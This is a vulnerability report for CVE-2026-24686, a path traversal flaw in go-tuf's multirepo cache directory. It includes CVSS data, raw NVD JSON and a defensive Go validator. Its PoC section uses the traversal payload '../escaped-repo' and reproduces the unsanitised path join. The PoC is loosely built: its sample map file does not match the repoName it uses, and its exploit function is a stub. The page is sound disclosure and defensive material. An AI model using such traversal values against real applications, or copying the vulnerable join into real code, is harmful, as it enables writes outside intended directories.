Security Vulnerability Report
CVE-2026-24686 CVSS 4.7 MEDIUM

Published: 2026-01-27 01:16:03
Last Modified: 2026-02-24 19:08:46

Description

go-tuf is a Go implementation of The Update Framework (TUF). go-tuf's TAP 4 Multirepo Client uses the map file repository name string (`repoName`) as a filesystem path component when selecting the local metadata cache directory. Starting in version 2.0.0 and prior to version 2.4.1, if an application accepts a map file from an untrusted source, an attacker can supply a `repoName` containing traversal (e.g., `../escaped-repo`) and cause go-tuf to create directories and write the root metadata file outside the intended `LocalMetadataDir` cache base, within the running process's filesystem permissions. Version 2.4.1 contains a patch.
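The defensive counterpart of the issue described above, added here as an illustration (it is not code from go-tuf, the advisory or the patch): a repository name taken from a map file is only ever used as a single directory segment, and the resulting cache path is verified to still lie under the metadata base before it is used. `SafeRepoCacheDir` and `PathWithinBase` are hypothetical helper names; the base directory and the repository names in `main` are constructed samples.

```go
package main

import (
	"errors"
	"fmt"
	"path/filepath"
	"strings"
)

// ErrUnsafeRepoName is returned when a map-file repository name cannot be
// used as a single directory name under the metadata cache base.
var ErrUnsafeRepoName = errors.New("unsafe repository name")

// SafeRepoCacheDir (hypothetical helper, not go-tuf's API) returns
// base/repoName only when repoName is a plain, single-segment directory
// name. Anything that can move the result up or across the hierarchy is
// rejected: empty names, "." and "..", either path separator, a NUL byte,
// or an absolute / volume-qualified name.
func SafeRepoCacheDir(base, repoName string) (string, error) {
	switch repoName {
	case "", ".", "..":
		return "", fmt.Errorf("%w: %q", ErrUnsafeRepoName, repoName)
	}
	if strings.ContainsAny(repoName, "/\\\x00") {
		return "", fmt.Errorf("%w: %q contains a separator or NUL", ErrUnsafeRepoName, repoName)
	}
	if filepath.IsAbs(repoName) || filepath.VolumeName(repoName) != "" {
		return "", fmt.Errorf("%w: %q is absolute", ErrUnsafeRepoName, repoName)
	}
	dir := filepath.Join(base, repoName)
	// Defense in depth: even after the allow-list, confirm the cleaned
	// result is still inside base before handing it to the caller.
	if !PathWithinBase(base, dir) {
		return "", fmt.Errorf("%w: %q resolves outside %q", ErrUnsafeRepoName, repoName, base)
	}
	return dir, nil
}

// PathWithinBase reports whether candidate, after lexical cleaning, lies
// under base. It uses filepath.Rel rather than a string prefix test, so
// "/cache/tufx/..." is not mistaken for a child of "/cache/tuf". Symlinks
// are not resolved here; callers that need that should compare
// filepath.EvalSymlinks results instead.
func PathWithinBase(base, candidate string) bool {
	rel, err := filepath.Rel(filepath.Clean(base), filepath.Clean(candidate))
	if err != nil {
		return false
	}
	return rel != ".." && !strings.HasPrefix(rel, ".."+string(filepath.Separator))
}

func main() {
	base := "/var/cache/tuf" // constructed sample LocalMetadataDir
	// Constructed sample repository names as they might appear as keys in
	// an untrusted TAP 4 map file; only the first two should be accepted.
	names := []string{"myrepo", "repo.v2", "../escaped-repo", `..\escaped-repo`, "a/b", "..", ""}
	for _, name := range names {
		dir, err := SafeRepoCacheDir(base, name)
		if err != nil {
			fmt.Printf("reject %-18q %v\n", name, err)
			continue
		}
		fmt.Printf("accept %-18q -> %s\n", name, dir)
	}
	// Auditing a path the cache layer already built: the traversal case
	// and the prefix-collision case are both caught.
	paths := []string{
		base + "/myrepo/root.json",
		base + "/../escaped-repo/root.json",
		"/var/cache/tufx/root.json",
	}
	for _, p := range paths {
		fmt.Printf("within base? %-40s %v\n", p, PathWithinBase(base, p))
	}
}
```

The allow-list does the real work: a repository name that is only ever one directory segment cannot contain `..` or a separator, so there is nothing for `filepath.Join` to collapse. `PathWithinBase` is kept as a second, independent check and is also what an audit or test would run against the path the cache layer actually produced.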

CVSS Details

CVSS Score
4.7
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:theupdateframework:go-tuf:*:*:*:*:*:*:*:* - VULNERABLE
go-tuf >= 2.0.0
go-tuf < 2.4.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
Go
package main

import (
	"fmt"
	"os"
	"path/filepath"
	"strings"
)

// Malicious map file content with path traversal in repoName.
const maliciousMapContent = `{
  "root": "keys/root.json",
  "targets": "../escaped-repo/targets",
  "snapshot": "../escaped-repo/snapshot.json",
  "timestamp": "../escaped-repo/timestamp.json"
}`

// This PoC models only the vulnerable path construction: it does not call
// go-tuf itself, it reproduces how a repoName taken from the map file ends up
// as a path component under the local metadata directory.
func main() {
	// Create a temporary directory for testing.
	tmpDir, err := os.MkdirTemp("", "go-tuf-test")
	if err != nil {
		panic(err)
	}
	defer os.RemoveAll(tmpDir)

	// Create the malicious map file.
	mapFilePath := filepath.Join(tmpDir, "map.json")
	if err := os.WriteFile(mapFilePath, []byte(maliciousMapContent), 0644); err != nil {
		panic(err)
	}

	// Set up the local metadata directory.
	localMetadataDir := filepath.Join(tmpDir, "metadata")
	if err := os.MkdirAll(localMetadataDir, 0755); err != nil {
		panic(err)
	}

	// A multirepo client initialised with the malicious map file would use
	// this repoName when selecting the cache directory.
	repoName := "../escaped-repo" // path traversal payload
	fmt.Printf("Repository name (user-controlled): %s\n", repoName)
	fmt.Printf("Local metadata dir: %s\n", localMetadataDir)
	fmt.Printf("Expected cache path: %s/%s\n", localMetadataDir, repoName)

	// The vulnerability: repoName is used directly in path construction
	// without sanitization, allowing directory traversal. filepath.Join
	// cleans the ".." so the result lands beside, not inside, the cache.
	cacheDir := filepath.Join(localMetadataDir, repoName)
	fmt.Printf("Actual cache path created: %s\n", cacheDir)

	// Proof: this path escapes the intended metadata directory.
	if !strings.HasPrefix(cacheDir, localMetadataDir) {
		fmt.Println("[VULNERABLE] Path traversal detected!")
	}
}

// Additional exploit scenario: the root metadata file is written outside the
// cache directory. In the vulnerable versions go-tuf writes root metadata for
// the repository to LocalMetadataDir/<repoName>/root.json, which for the
// payload above resolves to LocalMetadataDir/../escaped-repo/root.json.
func exploitViaRootMetadata() {
	fmt.Println("Exploit: Write root metadata to arbitrary location")
}

References

https://github.com/theupdateframework/go-tuf/commit/d361e2ea24e427581343dee5c7a32b485d79fcc0 (Patch)
https://github.com/theupdateframework/go-tuf/security/advisories/GHSA-jqc5-w2xx-5vq4 (Exploit, Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-24686", "sourceIdentifier": "[email protected]", "published": "2026-01-27T01:16:02.790", "lastModified": "2026-02-24T19:08:46.017", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "go-tuf is a Go implementation of The Update Framework (TUF). go-tuf's TAP 4 Multirepo Client uses the map file repository name string (`repoName`) as a filesystem path component when selecting the local metadata cache directory. Starting in version 2.0.0 and prior to version 2.4.1, if an application accepts a map file from an untrusted source, an attacker can supply a `repoName` containing traversal (e.g., `../escaped-repo`) and cause go-tuf to create directories and write the root metadata file outside the intended `LocalMetadataDir` cache base, within the running process's filesystem permissions. Version 2.4.1 contains a patch."}, {"lang": "es", "value": "go-tuf es una implementación en Go de The Update Framework (TUF). El cliente Multirepo TAP 4 de go-tuf utiliza la cadena del nombre del repositorio del archivo de mapa ('repoName') como un componente de ruta del sistema de archivos al seleccionar el directorio de caché de metadatos local. A partir de la versión 2.0.0 y antes de la versión 2.4.1, si una aplicación acepta un archivo de mapa de una fuente no confiable, un atacante puede proporcionar un 'repoName' que contenga recorrido (p. ej., '../escaped-repo') y hacer que go-tuf cree directorios y escriba el archivo de metadatos raíz fuera de la base de caché 'LocalMetadataDir' prevista, dentro de los permisos del sistema de archivos del proceso en ejecución. La versión 2.4.1 contiene un parche."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.0, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.0, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:theupdateframework:go-tuf:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.0.0", "versionEndExcluding": "2.4.1", "matchCriteriaId": "18AEE62D-019F-48BA-ADF7-C7F5C1C72E9E"}]}]}], "references": [{"url": "https://github.com/theupdateframework/go-tuf/commit/d361e2ea24e427581343dee5c7a32b485d79fcc0", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/theupdateframework/go-tuf/security/advisories/GHSA-jqc5-w2xx-5vq4", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}